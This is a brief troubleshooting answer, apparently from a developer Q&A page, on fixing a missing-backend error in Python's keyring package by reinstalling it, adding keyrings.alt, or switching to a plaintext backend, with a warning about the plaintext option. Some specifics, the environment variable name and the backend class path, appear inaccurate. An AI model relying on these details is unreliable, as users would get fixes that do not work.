This error message indicates that the Python `keyring` package is missing a backend module that it needs to function properly. To resolve this issue, you can try reinstalling the `keyring` package using pip: ``` pip install keyring ``` If that doesn't work, you can try installing the missing backend module directly. For example, if the error message mentioned the `keyring.backends.Gnome` module, you could install it using: ``` pip install keyrings.alt ``` Alternatively, you can try using a different backend by setting the `KEYRING_BACKEND` environment variable. For example, to use the `file` backend, you could run: ``` export KEYRING_BACKEND=keyring.backends.file.PlaintextKeyring ``` Note that using a plaintext keyring backend can be a security risk, so use it at your own risk.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值